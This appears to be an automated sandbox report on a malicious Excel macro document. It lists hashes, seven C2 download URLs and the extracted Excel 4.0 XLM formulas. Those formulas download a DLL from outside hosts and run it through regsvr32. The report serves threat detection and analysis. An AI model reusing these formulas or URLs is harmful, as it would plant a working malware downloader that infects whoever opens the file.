General

  • Target

    4ac3cfd7ad8cf62e160f55053626f2a2a1cf14ca1045220bb88e38d8e7771001.zip

  • Size

    43KB

  • MD5

    4024d681047d43a1fe48450d660fb96a

  • SHA1

    5264f47c307def5197aab658064799bb11bc1079

  • SHA256

    f95f678699ce53f1410be50ca230681ac333f9eb45fa6ff5600c56ded85e41f2

  • SHA512

    7c3f207c7470856170c47b163298714a129c8a431ec91b28874854959fdcc0cec1d5b153ae53ff20e12f02e34c6bf498bd2653cdd1b697ab4a361777716666fb

  • SSDEEP

    768:4x34hEa7zRhYJA/qeFi5GqH7/Bnyga1ZqOkXzVaunvsAKujINKooPE:O47zQJsqeFi5HH7Znyga1w1ZaBAKujK1

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.arkpp.com/ARIS-BSU/9K1/

http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/

http://www.babylinesl.com/catalog/iVsl6YvlyIyX/

https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/

https://unada.us/acme-challenge/3NXwcYNCa/

https://automobile-facile.fr/wp-admin/QV/

https://alebit.de/css/gqKtdKmTsC4iDh/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arkpp.com/ARIS-BSU/9K1/","..\fbd.dll",0,0)
    =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/","..\fbd.dll",0,0))
    =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.babylinesl.com/catalog/iVsl6YvlyIyX/","..\fbd.dll",0,0))
    =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/","..\fbd.dll",0,0))
    =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://unada.us/acme-challenge/3NXwcYNCa/","..\fbd.dll",0,0))
    =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://automobile-facile.fr/wp-admin/QV/","..\fbd.dll",0,0))
    =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alebit.de/css/gqKtdKmTsC4iDh/","..\fbd.dll",0,0))
    =IF('EGVEB'!D21<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll")
    =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 4ac3cfd7ad8cf62e160f55053626f2a2a1cf14ca1045220bb88e38d8e7771001.zip
    .zip

    Password: infected

  • 4ac3cfd7ad8cf62e160f55053626f2a2a1cf14ca1045220bb88e38d8e7771001.xlsm
    .xlsm office2007